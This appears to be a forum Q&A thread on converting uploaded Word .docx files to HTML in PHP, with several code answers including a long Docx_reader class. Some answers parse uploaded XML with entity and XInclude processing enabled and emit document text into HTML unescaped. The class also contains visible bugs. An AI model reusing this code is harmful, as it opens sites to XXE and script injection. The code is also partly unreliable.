$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
if (strpos($imgpathdef->extractedpath, $rel->Target) >= 0)
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>

How can I convert a docx document to html using php?

I want to be able to upload an MS word document and export it a page in my site.
Is there any way to accomplish this?
//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = DOMDocument::loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
$contents = explode('\n',strip_tags($xml->saveXML()));
$text = '';
foreach($contents as $i=>$content) {
$text .= $contents[$i];
}
return $text;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument are both inside PHP so you don't need to install/include/require additional libraries.
One may use PHPDocX.
It has support for practically all HTML CSS styles. Moreover you may use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML.
The HTML methods of PHPDocX also allow for the direct use of Word styles. You may use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
If you want that all your tables use the MediumGrid3-accent5 Word style. The embedHTML method as well as its version for templates (replaceTemplateVariableByHTML) preserve inheritance, meaning by that that you may use a predefined Word style and override with CSS any of its properties.
You may also extract selected parts of your HTML using 'JQuery type' selectors.
You can convert Word docx documents to html using Print2flash library. Here is an PHP excerpt from my client's site which converts a document to html:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts a document which path is specified in $wordfile variable to a html page file specified by $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file altogether with a fuller sample from Print2flash SDK.
this is a workaround based on David Lin's answer above
removing "w:" in a docx's xml tags leave behing Html like tags
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
Ok Im in very late, but thought I'd post this to save you all some time.
This is some php code I have put together not just to read the text from docx but the images too, currently it does not support floating images / text, but what I have done so far is a massive move forwards to whats already been posted on here - note you need to update https://example.co.uk to YOUR domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->savepath . $imagename;
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
}
//push style to the array of styles
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process text alignment
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "word-spacing:" . 10 . "px;";
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
$bval = $prchildnode->attributes->getNamedItem('before')->nodeValue;
if (strcmp($bval, '') == 0)
$bval = 0;
$pitem->innerstyle .= "padding-top:" . $bval . "px;";
$aval = $prchildnode->attributes->getNamedItem('after')->nodeValue;
if (strcmp($aval, '') == 0)
$aval = 0;
$pitem->innerstyle .= "padding-bottom:" . $aval . "px;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "text-weight: 500;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "text-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
if (strpos($imgpathdef->extractedpath, $rel->Target) >= 0)
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>

Categories